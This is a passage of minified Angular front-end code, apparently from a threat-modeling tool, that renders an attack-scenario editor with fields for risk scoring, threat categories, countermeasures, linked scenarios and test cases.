e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function x7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedCountermeasure=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",90),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveCountermeasure(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n          "),m(14,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteCountermeasure(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedCountermeasure===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedCountermeasure===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function w7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-countermeasure",93),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("countermeasure",e.selectedCountermeasure)}}function I7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-cve-entry",95),s(2,"\n      ")),2&t){const e=B(3);C(1),V("entry",e.attackScenario.CveEntry)}}function R7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,I7e,3,1,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.CveInfo"),"\n        "),C(4),ct("\n          ",e.attackScenario.CveEntry.ID,"\n          ")}}function S7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-vector",96),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("attackVector",e.attackScenario.AttackVector)}}function k7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,S7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.AttackVectorInfo"),"\n        "),C(4),ct("\n          ",e.attackScenario.AttackVector.Name,"\n          ")}}function P7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-question",97),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("threatQuestion",e.attackScenario.ThreatQuestion)}}function O7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,P7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.Question"),"\n        "),C(4),ct("\n          ",e.attackScenario.ThreatQuestion.Name,"\n          ")}}function N7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-rule",98),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("threatRule",e.attackScenario.ThreatRule)}}function L7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,N7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.Rule"),"\n        "),C(4),ct("\n          ",e.attackScenario.ThreatRule.Name,"\n          ")}}function z7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(381))("matMenuTriggerData",fr(3,A5,e.scenarios)),C(1),ke(e.name)}}function W7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function F7e(t,a){if(1&t&&(s(0,"\n              "),ne(1,W7e,2,2,"button",40),s(2,"\n            ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function V7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnLinkScenario(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function B7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedLinkedScenario=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),u(),s(7,"\n          "),m(8,"button",90),he("click",function(){const r=be(e).$implicit;return Me(B(2).EditAttackScenario(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"edit"),u()(),s(12,"\n          "),m(13,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnUnlinkScenario(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"remove"),u()(),s(17,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedLinkedScenario===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedLinkedScenario===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,8,"general.Edit")),C(5),at("matTooltip",re(14,10,"general.Remove"))}}function H7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-attack-scenario",99),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("canEdit",!1)("attackScenario",e.selectedLinkedScenario)}}function U7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function q7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function G7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),u(),s(7,"\n          "),m(8,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Remove"))}}function j7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-test-case",103),s(3,"\n      "),u()),2&t){const e=B(3);C(2),V("testCase",e.selectedTestCase)}}function Q7e(t,a){if(1&t){const e=Ye();m(0,"div",48),s(1,"\n    "),m(2,"div",49),s(3,"\n      "),m(4,"mat-list",50),s(5,"\n        "),m(6,"div",51),s(7),oe(8,"translate"),m(9,"button",52),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n          "),m(14,"mat-menu",null,100),s(16,"\n            "),m(17,"input",34,101),he("ngModelChange",function(n){return be(e),Me(B(2).searchTCString=n)})("click",function(){return be(e),Me(B(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n            "),ne(21,U7e,2,2,"button",40),s(22,"\n          "),u(),s(23,"\n          "),m(24,"mat-menu",null,102),s(26,"\n            "),ne(27,q7e,2,2,"button",40),s(28,"\n          "),u(),s(29,"\n        "),u(),s(30,"\n        "),ne(31,G7e,13,9,"mat-list-item",59),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n    "),m(35,"div",60),s(36,"\n      "),ne(37,j7e,4,1,"div",61),s(38,"\n    "),u(),s(39,"\n  "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=B(2);C(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(8,14,"properties.LinkedTestCases")," \n          "),C(2),at("matTooltip",re(10,16,"general.Add")),V("matMenuTriggerFor",e),C(8),at("placeholder",re(19,18,"general.Search")),V("ngModel",n.searchTCString)("matMenuTriggerFor",i),C(4),V("ngForOf",n.GetTestCases()),C(6),V("ngForOf",n.GetFilteredTestCases()),C(4),V("ngForOf",n.attackScenario.GetTestCases()),C(6),V("ngIf",n.selectedTestCase)}}function $7e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Name=n)}),u(),s(10,"\n    "),ne(11,q5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Number=n)}),u(),s(21,"\n    "),ne(22,G5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().attackScenario.ThreatState=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,j5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),ne(40,Q5e,3,3,"mat-icon",11),s(41,"\n  "),it(42,"br"),s(43,"\n  "),m(44,"mat-form-field",12),s(45,"\n    "),m(46,"mat-label"),s(47),oe(48,"translate"),u(),s(49,"\n    "),it(50,"input",13),s(51,"\n  "),u(),s(52,"\n  "),m(53,"mat-form-field",14),s(54,"\n    "),m(55,"mat-label"),s(56),oe(57,"translate"),u(),s(58,"\n    "),it(59,"input",15),s(60,"\n  "),u(),s(61,"\n  "),m(62,"mat-form-field",16),s(63,"\n    "),m(64,"mat-label"),s(65),oe(66,"translate"),u(),s(67,"\n    "),it(68,"input",13),s(69,"\n  "),u(),s(70,"\n  "),it(71,"br"),s(72,"\n  "),m(73,"mat-form-field",8),s(74,"\n    "),m(75,"mat-label"),s(76),oe(77,"translate"),oe(78,"translate"),u(),s(79,"\n    "),m(80,"mat-select",17),he("valueChange",function(n){return be(e),Me(B().attackScenario.AttackVector=n)}),s(81,"\n      "),m(82,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchAttackVectors(n))}),oe(83,"translate"),u(),s(84,"\n      "),m(85,"mat-option"),s(86),oe(87,"translate"),u(),s(88,"\n      "),ne(89,K5e,4,2,"mat-optgroup",19),s(90,"\n    "),u(),s(91,"\n    "),m(92,"button",20),he("click",function(n){return be(e),B().AddAttackVector(),Me(n.stopPropagation())}),oe(93,"translate"),s(94,"\n      "),m(95,"mat-icon"),s(96,"add"),u(),s(97,"\n    "),u(),s(98,"\n  "),u(),s(99,"\n  "),m(100,"mat-form-field",21),s(101,"\n    "),m(102,"mat-label"),s(103),oe(104,"translate"),u(),s(105,"\n    "),m(106,"mat-select",22),he("valueChange",function(n){return be(e),Me(B().attackScenario.ThreatCategories=n)})("selectionChange",function(){return be(e),Me(B().sysThreatGroups=null)}),s(107,"\n      "),m(108,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchThreatCategories(n))}),oe(109,"translate"),u(),s(110,"\n      "),ne(111,Y5e,4,2,"mat-optgroup",19),s(112,"\n    "),u(),s(113,"\n  "),u(),s(114,"\n  "),m(115,"mat-form-field",23),s(116,"\n    "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n    "),m(121,"mat-select",24),he("valueChange",function(n){return be(e),Me(B().attackScenario.SystemThreats=n)}),s(122,"\n      "),m(123,"input",18),he("keyup",function(n){return be(e),Me(B().OnSearchSystemThreat(n))}),oe(124,"translate"),u(),s(125,"\n      "),ne(126,Z5e,5,4,"mat-optgroup",19),s(127,"\n    "),u(),s(128,"\n  "),u(),s(129,"\n  "),ne(130,i7e,17,9,"mat-form-field",25),s(131,"\n  "),m(132,"mat-form-field",26),s(133,"\n    "),m(134,"mat-label"),s(135),oe(136,"translate"),u(),s(137,"\n    "),m(138,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.Description=n)}),u(),s(139,"\n  "),u(),s(140,"\n  "),it(141,"app-tags",28),s(142),oe(143,"translate"),m(144,"button",29),oe(145,"translate"),s(146,"\n    "),m(147,"mat-icon"),s(148,"more_vert"),u(),s(149,"\n  "),u(),s(150,"\n  "),m(151,"mat-menu",null,30),s(153,"\n    "),m(154,"button",31),he("click",function(){return be(e),Me(B().AddMethodCVSS())}),s(155),oe(156,"translate"),u(),s(157,"\n    "),m(158,"button",31),he("click",function(){return be(e),Me(B().AddMethodOwaspRR())}),s(159),oe(160,"translate"),u(),s(161,"\n    "),m(162,"button",32),s(163),oe(164,"translate"),u(),s(165,"\n  "),u(),s(166,"\n  "),m(167,"mat-menu",null,33),s(169,"\n    "),m(170,"input",34,35),he("ngModelChange",function(n){return be(e),Me(B().searchASString=n)})("click",function(){return be(e),Me(B().OnSearchASBoxClick())}),oe(172,"translate"),u(),s(173,"\n    "),ne(174,a7e,2,5,"button",36),s(175,"\n  "),u(),s(176,"\n  "),m(177,"mat-menu",null,37),s(179,"\n    "),ne(180,o7e,3,1,"ng-template",38),s(181," \n  "),u(),s(182,"\n  "),m(183,"mat-menu",null,39),s(185,"\n    "),ne(186,r7e,2,2,"button",40),s(187,"\n  "),u(),s(188,"\n  "),ne(189,s7e,20,4,"mat-form-field",41),s(190,"\n  "),ne(191,l7e,27,8,"mat-form-field",41),s(192,"\n  "),m(193,"mat-form-field",42),s(194,"\n    "),m(195,"mat-label"),s(196),oe(197,"translate"),u(),s(198,"\n    "),m(199,"mat-select",43),he("valueChange",function(n){return be(e),Me(B().attackScenario.Severity=n)})("selectionChange",function(){return be(e),Me(B().attackScenario.CalculateRisk())}),s(200,"\n      "),m(201,"mat-option"),s(202),oe(203,"translate"),u(),s(204,"\n      "),ne(205,d7e,3,4,"mat-option",10),s(206,"\n    "),u(),s(207,"\n    "),ne(208,m7e,5,0,"button",44),s(209,"\n    "),ne(210,u7e,5,0,"button",44),s(211,"\n  "),u(),s(212,"\n  "),m(213,"mat-form-field",45),s(214,"\n    "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n    "),m(219,"mat-select",43),he("valueChange",function(n){return be(e),Me(B().attackScenario.Likelihood=n)})("selectionChange",function(){return be(e),Me(B().attackScenario.CalculateRisk())}),s(220,"\n      "),m(221,"mat-option"),s(222),oe(223,"translate"),u(),s(224,"\n      "),ne(225,h7e,3,4,"mat-option",10),s(226,"\n    "),u(),s(227,"\n    "),ne(228,f7e,5,0,"button",44),s(229,"\n    "),ne(230,p7e,5,0,"button",44),s(231,"\n  "),u(),s(232,"\n  "),m(233,"mat-form-field",45),s(234,"\n    "),m(235,"mat-label"),s(236),oe(237,"translate"),u(),s(238,"\n    "),m(239,"mat-select",46),he("valueChange",function(n){return be(e),Me(B().attackScenario.Risk=n)}),s(240,"\n      "),m(241,"mat-option"),s(242),oe(243,"translate"),u(),s(244,"\n      "),ne(245,_7e,3,4,"mat-option",10),s(246,"\n    "),u(),s(247,"\n    "),ne(248,g7e,5,0,"button",44),s(249,"\n    "),ne(250,C7e,5,0,"button",44),s(251,"\n  "),u(),s(252,"\n  "),m(253,"mat-form-field",45),s(254,"\n    "),m(255,"mat-label"),s(256),oe(257,"translate"),u(),s(258,"\n    "),m(259,"mat-select",46),he("valueChange",function(n){return be(e),Me(B().attackScenario.RiskStrategy=n)}),s(260,"\n      "),m(261,"mat-option"),s(262),oe(263,"translate"),u(),s(264,"\n      "),ne(265,y7e,3,4,"mat-option",10),s(266,"\n    "),u(),s(267,"\n  "),u(),s(268,"\n  "),ne(269,b7e,8,5,"mat-form-field",47),s(270,"\n  "),ne(271,M7e,8,5,"mat-form-field",47),s(272,"\n  "),ne(273,v7e,8,5,"mat-form-field",47),s(274,"\n  "),m(275,"mat-form-field",26),s(276,"\n    "),m(277,"mat-label"),s(278),oe(279,"translate"),u(),s(280,"\n    "),m(281,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B().attackScenario.RiskStrategyReason=n)}),u(),s(282,"\n  "),u(),s(283,"\n  "),m(284,"div",48),s(285,"\n    "),m(286,"div",49),s(287,"\n      "),m(288,"mat-list",50),s(289,"\n        "),m(290,"div",51),s(291),oe(292,"translate"),m(293,"button",52),oe(294,"translate"),m(295,"mat-icon"),s(296,"add"),u()(),s(297,"\n          "),m(298,"mat-menu",null,53),s(300,"\n            "),m(301,"button",54),he("click",function(){return be(e),Me(B().AddCountermeasure())}),s(302),oe(303,"translate"),u(),s(304,"\n            "),m(305,"button",32),s(306),oe(307,"translate"),u(),s(308,"\n          "),u(),s(309,"\n          "),m(310,"mat-menu",null,55),s(312,"\n            "),m(313,"input",34,56),he("ngModelChange",function(n){return be(e),Me(B().searchCMString=n)})("click",function(){return be(e),Me(B().OnSearchCMBoxClick())}),oe(315,"translate"),u(),s(316,"\n            "),ne(317,A7e,2,5,"button",36),s(318,"\n          "),u(),s(319,"\n          "),m(320,"mat-menu",null,57),s(322,"\n            "),ne(323,E7e,3,1,"ng-template",38),s(324," \n          "),u(),s(325,"\n          "),m(326,"mat-menu",null,58),s(328,"\n            "),ne(329,D7e,2,2,"button",40),s(330,"\n          "),u(),s(331,"\n        "),u(),s(332,"\n        "),ne(333,x7e,19,14,"mat-list-item",59),s(334,"\n      "),u(),s(335,"\n    "),u(),s(336,"\n    "),m(337,"div",60),s(338,"\n      "),ne(339,w7e,4,1,"div",61),s(340,"\n    "),u(),s(341,"\n  "),u(),s(342,"\n  "),m(343,"mat-accordion",62),s(344,"\n    "),ne(345,R7e,17,4,"mat-expansion-panel",63),s(346,"\n    "),ne(347,k7e,17,4,"mat-expansion-panel",63),s(348,"\n    "),ne(349,O7e,17,4,"mat-expansion-panel",63),s(350,"\n    "),ne(351,L7e,17,4,"mat-expansion-panel",63),s(352,"\n  "),u(),s(353,"\n  "),it(354,"br"),s(355,"\n  "),m(356,"div",48),s(357,"\n    "),m(358,"div",49),s(359,"\n      "),m(360,"mat-list",50),s(361,"\n        "),m(362,"div",51),s(363),oe(364,"translate"),m(365,"button",52),oe(366,"translate"),m(367,"mat-icon"),s(368,"add"),u()(),s(369,"\n          "),m(370,"mat-menu",null,64),s(372,"\n            "),m(373,"input",34,65),he("ngModelChange",function(n){return be(e),Me(B().searchLinkedASString=n)})("click",function(){return be(e),Me(B().OnSearchLinkedASBoxClick())}),oe(375,"translate"),u(),s(376,"\n            "),ne(377,z7e,2,5,"button",36),s(378,"\n          "),u(),s(379,"\n          "),m(380,"mat-menu",null,66),s(382,"\n            "),ne(383,F7e,3,1,"ng-template",38),s(384," \n          "),u(),s(385,"\n          "),m(386,"mat-menu",null,67),s(388,"\n            "),ne(389,V7e,2,2,"button",40),s(390,"\n          "),u(),s(391,"\n        "),u(),s(392,"\n        "),ne(393,B7e,18,12,"mat-list-item",59),s(394,"\n      "),u(),s(395,"\n    "),u(),s(396,"\n    "),m(397,"div",60),s(398,"\n      "),ne(399,H7e,4,2,"div",61),s(400,"\n    "),u(),s(401,"\n  "),u(),s(402,"\n  "),ne(403,Q7e,40,20,"div",68),s(404,"\n"),u()}if(2&t){const e=Ti(152),i=Ti(168),n=Ti(184),r=Ti(299),c=Ti(311),d=Ti(327),T=Ti(371),k=Ti(387),q=B();let Y,te;Ct("disable",!q.canEdit),C(5),ke(re(6,131,"properties.Name")),C(3),at("matTooltip",q.attackScenario.Name),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Name),C(3),V("ngIf",q.attackScenario.Name),C(6),ke(re(18,133,"general.Number")),C(3),at("matTooltip",q.attackScenario.Number),V("ngModel",q.attackScenario.Number),C(2),V("ngIf",q.attackScenario.CheckUniqueNumber()),C(8),ke(re(31,135,"properties.Status")),C(3),at("matTooltip",re(34,137,q.GetThreatStateName(q.attackScenario.ThreatState))),V("value",q.attackScenario.ThreatState),C(3),V("ngForOf",q.GetThreatStates()),C(4),V("ngIf",!q.attackScenario.RuleStillApplies),C(7),ke(re(48,139,"general.Target")),C(3),at("matTooltip",null==q.attackScenario.Target?null:q.attackScenario.Target.GetProperty("Name")),V("spellcheck",q.dataService.HasSpellCheck)("value",null==q.attackScenario.Target?null:q.attackScenario.Target.Name),C(6),ke(re(57,141,"general.Targets")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("value",q.GetTargetsNames()),C(6),ke(re(66,143,"general.Diagram")),C(3),at("matTooltip",null==(Y=q.attackScenario.GetDiagram())?null:Y.Name),V("spellcheck",q.dataService.HasSpellCheck)("value",null==(te=q.attackScenario.GetDiagram())?null:te.Name),C(8),za("",re(77,145,"general.AttackVector")," (",re(78,147,"general.Informative"),")"),C(4),at("matTooltip",null==q.attackScenario.AttackVector?null:q.attackScenario.AttackVector.Name),V("value",q.attackScenario.AttackVector),C(2),at("placeholder",re(83,149,"general.Search")),C(4),ke(re(87,151,"properties.selectNone")),C(3),V("ngForOf",q.GetAttackVectorGroups()),C(3),at("matTooltip",re(93,153,"general.Add")),C(11),ct("",re(104,155,"general.ThreatCategories"),"*"),C(3),V("value",q.attackScenario.ThreatCategories),C(2),at("placeholder",re(109,157,"general.Search")),C(3),V("ngForOf",q.GetThreatCategoryGroups()),C(4),XS("width: calc(100% - ",q.GetSystemThreatsWidth(),");"),C(3),ke(re(119,159,"general.SystemThreats")),C(3),V("value",q.attackScenario.SystemThreats),C(2),at("placeholder",re(124,161,"general.Search")),C(3),V("ngForOf",q.GetSystemThreatGroups()),C(4),V("ngIf",q.dataService.Project.Settings.ThreatActorToAttackScenario),C(5),ke(re(136,163,"properties.Description")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Description),C(3),V("tagableElement",q.attackScenario),C(1),ct("\n  ",re(143,165,"general.RiskAssessment")," \n  "),C(2),at("matTooltip",re(145,167,"general.More")),V("matMenuTriggerFor",e),C(10),V("disabled",null!=q.attackScenario.ScoreCVSS),C(1),ke(re(156,169,"pages.modeling.attackscenario.addCVSS")),C(3),V("disabled",null!=q.attackScenario.ScoreOwaspRR),C(1),ke(re(160,171,"pages.modeling.attackscenario.addOwaspRR")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(164,173,"pages.modeling.attackscenario.takeRiskValuesFrom")),C(7),at("placeholder",re(172,175,"general.Search")),V("ngModel",q.searchASString)("matMenuTriggerFor",n),C(4),V("ngForOf",q.GetAttackScenarioGroups()),C(12),V("ngForOf",q.GetFilteredAttackScenarios()),C(3),V("ngIf",q.attackScenario.ScoreCVSS),C(2),V("ngIf",q.attackScenario.ScoreOwaspRR),C(5),ke(re(197,177,"properties.Severity")),C(3),V("value",q.attackScenario.Severity),C(3),ke(re(203,179,"properties.selectNone")),C(3),V("ngForOf",q.GetSeverityTypes()),C(3),V("ngIf",null==q.attackScenario.SeverityReason),C(2),V("ngIf",null!=q.attackScenario.SeverityReason),C(6),ke(re(217,181,"general.Likelihood")),C(3),V("value",q.attackScenario.Likelihood),C(3),ke(re(223,183,"properties.selectNone")),C(3),V("ngForOf",q.GetLMHValues()),C(3),V("ngIf",null==q.attackScenario.LikelihoodReason),C(2),V("ngIf",null!=q.attackScenario.LikelihoodReason),C(6),ke(re(237,185,"properties.Risk")),C(3),V("value",q.attackScenario.Risk),C(3),ke(re(243,187,"properties.selectNone")),C(3),V("ngForOf",q.GetSeverityTypes()),C(3),V("ngIf",null==q.attackScenario.RiskReason),C(2),V("ngIf",null!=q.attackScenario.RiskReason),C(6),ke(re(257,189,"properties.RiskStrategy")),C(3),V("value",q.attackScenario.RiskStrategy),C(3),ke(re(263,191,"properties.selectNone")),C(3),V("ngForOf",q.GetRiskStrategies()),C(4),V("ngIf",null!=q.attackScenario.SeverityReason),C(2),V("ngIf",null!=q.attackScenario.LikelihoodReason),C(2),V("ngIf",null!=q.attackScenario.RiskReason),C(5),ke(re(279,193,"properties.RiskStrategyReason")),C(3),V("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.RiskStrategyReason),C(7),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),C(3),ct("",re(292,195,"general.Countermeasures")," \n          "),C(2),at("matTooltip",re(294,197,"general.Add")),V("matMenuTriggerFor",r),C(9),ke(re(303,199,"general.New")),C(3),V("matMenuTriggerFor",c),C(1),ke(re(307,201,"general.Existing")),C(7),at("placeholder",re(315,203,"general.Search")),V("ngModel",q.searchCMString)("matMenuTriggerFor",d),C(4),V("ngForOf",q.GetCountermeasureGroups()),C(12),V("ngForOf",q.GetFilteredCountermeasures()),C(4),V("ngForOf",q.countermeasures),C(6),V("ngIf",q.selectedCountermeasure),C(6),V("ngIf",q.attackScenario.CveEntry),C(2),V("ngIf",q.attackScenario.AttackVector),C(2),V("ngIf",q.attackScenario.ThreatQuestion),C(2),V("ngIf",q.attackScenario.ThreatRule),C(9),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),C(3),ct("",re(364,205,"properties.LinkedScenarios")," \n          "),C(2),at("matTooltip",re(366,207,"general.Add")),V("matMenuTriggerFor",T),C(8),at("placeholder",re(375,209,"general.Search")),V("ngModel",q.searchLinkedASString)("matMenuTriggerFor",k),C(4),V("ngForOf",q.GetAttackScenarioGroups()),C(12),V("ngForOf",q.GetFilteredLinkedAttackScenarios()),C(4),V("ngForOf",q.attackScenario.LinkedScenarios),C(6),V("ngIf",q.selectedLinkedScenario),C(4),V("ngIf",q.dataService.Project.HasTesting)}}let lM=(()=>{class t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.dialog=c,this.searchCounter=0,this.canEdit=!0,this.searchASString="",this.searchLinkedASString="",this.searchCMString="",this.searchTCString="",this.attackScenario=e,i&&i.subscribe(d=>this.attackScenario=d)}get attackScenario(){return this._attackScenario}set attackScenario(e){this._attackScenario=e,e&&(this.countermeasures=e.GetCountermeasures()),this.selectedCountermeasure=this.selectedLinkedScenario=this.selectedTestCase=null,this.sysThreatGroups=this.threatSources=this.threatCategoryGroups=this.attackVectorGroups=this.attackScenarioGroups=this.countermeasureGroups=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetAttackVectorGroups(){return null==this.attackVectorGroups&&(this.attackVectorGroups=[],this.dataService.Config.GetAttackVectorGroups().forEach(e=>{e.AttackVectors.length>0&&this.attackVectorGroups.push({name:e.Name,AttackVectors:e.AttackVectors})})),this.attackVectorGroups}OnSearchAttackVectors(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.attackVectorGroups=null,this.GetAttackVectorGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.AttackVector;this.attackVectorGroups.forEach(r=>{r.AttackVectors=r.AttackVectors.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.attackVectorGroups=this.attackVectorGroups.filter(r=>r.AttackVectors.length>0)}},250)}GetThreatCategoryGroups(){return null==this.threatCategoryGroups&&(this.threatCategoryGroups=[],this.dataService.Config.GetThreatCategoryGroups().forEach(e=>{e.ThreatCategories.length>0&&this.threatCategoryGroups.push({name:e.Name,ThreatCategories:e.ThreatCategories})})),this.threatCategoryGroups}OnSearchThreatCategories(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatCategoryGroups=null,this.GetThreatCategoryGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatCategories;this.threatCategoryGroups.forEach(r=>{r.ThreatCategories=r.ThreatCategories.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.threatCategoryGroups=this.threatCategoryGroups.filter(r=>r.ThreatCategories.length>0)}},250)}GetSystemThreatGroups(){if(null==this.sysThreatGroups){this.sysThreatGroups=[];const 